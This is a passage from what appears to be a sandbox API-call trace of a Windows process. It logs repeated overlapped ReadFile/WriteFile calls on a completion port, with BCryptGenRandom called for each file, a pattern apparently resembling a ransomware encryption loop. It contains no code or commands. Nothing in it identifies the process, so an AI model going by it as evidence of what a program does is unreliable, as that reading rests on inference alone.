lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.532] CloseHandle (hObject=0x338) returned 1 [0187.532] free (_Block=0x3f70048) [0187.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.540] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10f61, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0187.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0187.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0187.548] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.548] free (_Block=0x3e305b8) [0187.548] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.548] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.549] free (_Block=0x1fa91d0) [0187.549] free (_Block=0x1fa2ed8) [0187.549] free (_Block=0x1fa90b8) [0187.549] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0187.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0187.563] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xd748, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0187.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.720] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x106f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0190.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0190.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0190.729] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.729] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.729] free (_Block=0x3e305b8) [0190.730] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.730] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.730] free (_Block=0x1fa91d0) [0190.730] free (_Block=0x1fa2ed8) [0190.730] free (_Block=0x1fa90b8) [0190.730] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0190.730] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.736] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x124a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0190.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0190.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0190.744] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.744] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.744] free (_Block=0x3e305b8) [0190.744] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.744] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.744] free (_Block=0x1fa91d0) [0190.744] free (_Block=0x1fa2ed8) [0190.744] free (_Block=0x1fa90b8) [0190.744] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0190.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.748] CloseHandle (hObject=0x3cc) returned 1 [0190.749] free (_Block=0x3f70048) [0190.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0190.751] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x15d80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0190.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.470] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.481] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.488] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0193.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.497] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0193.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.507] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.519] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3bf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0193.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.530] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0193.530] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.545] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x39e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0193.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.549] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.928] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0193.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0193.936] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.936] free (_Block=0x3e305b8) [0193.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.936] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.937] free (_Block=0x1fa91d0) [0193.937] free (_Block=0x1fa2ed8) [0193.937] free (_Block=0x1fa90b8) [0193.937] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0193.938] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.942] CloseHandle (hObject=0x338) returned 1 [0193.942] free (_Block=0x3d70450) [0193.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.953] CloseHandle (hObject=0x308) returned 1 [0193.953] free (_Block=0x3f70048) [0193.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.962] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.965] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3c3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0193.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0193.993] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5261, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0194.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0194.047] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.047] free (_Block=0x3e305b8) [0194.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.047] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0194.047] free (_Block=0x1fa91d0) [0194.047] free (_Block=0x77d7a8) [0194.047] free (_Block=0x1fa90b8) [0194.047] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.064] CloseHandle (hObject=0x338) returned 1 [0194.072] free (_Block=0x1ff1e60) [0194.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.075] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x354d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.095] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbf90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.107] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.118] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.133] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.146] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa7b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.157] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.174] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5791, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.185] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.188] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0194.204] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, 